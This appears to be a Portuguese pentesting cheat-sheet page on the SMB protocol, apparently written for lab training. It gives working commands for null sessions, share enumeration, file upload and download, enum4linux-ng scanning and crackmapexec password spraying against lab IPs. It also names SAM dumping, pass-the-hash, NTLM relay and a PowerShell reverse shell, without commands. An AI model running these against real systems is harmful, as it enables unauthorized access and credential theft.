search
LinkedinTryHackme

SMB

Server Message Block (SMB) é um protocolo de comunicação criado para fornecer acesso compartilhado a arquivos e impressoras entre nós em uma rede. Inicialmente, ele foi projetado para rodar em cima do NetBIOS sobre TCP/IP (NBT) usando porta TCP 139e portas UDP 137e 138.

  • Teste de sessão nula no serviço SMB.

smbclient -N -L //10.129.14.128

  • Enumeração de compartilhamento de rede usando smbmap.

smbmap -H 10.129.14.128

  • Enumeração de compartilhamento de rede recursiva usando smbmap.

smbmap -H 10.129.14.128 -r notes

  • Baixe um arquivo específico da pasta compartilhada.

smbmap -H 10.129.14.128 --download "notes\note.txt"

  • Carregue um arquivo específico para a pasta compartilhada.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

  • Sessão nula com o rpcclient.

rpcclient -U'%' 10.10.110.17

  • Enumeração automatizada do serviço SMB usando enum4linux-ng.

./enum4linux-ng.py 10.10.11.45 -A -C

  • Pulverização de senhas contra diferentes usuários de uma lista.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

  • Conecte-se ao serviço SMB usando o impacket-psexec.

  • Execute um comando no serviço SMB usando crackmapexec.

  • Enumerando usuários conectados.

  • Extraia hashes do banco de dados SAM.

  • Use a técnica Pass-The-Hash para autenticar no host de destino.

  • Despeje o banco de dados SAM usando impacket-ntlmrelayx.

  • Execute um shell reverso baseado em PowerShell usando impacket-ntlmrelayx.

PreviousFTPNextQuestions

Last updated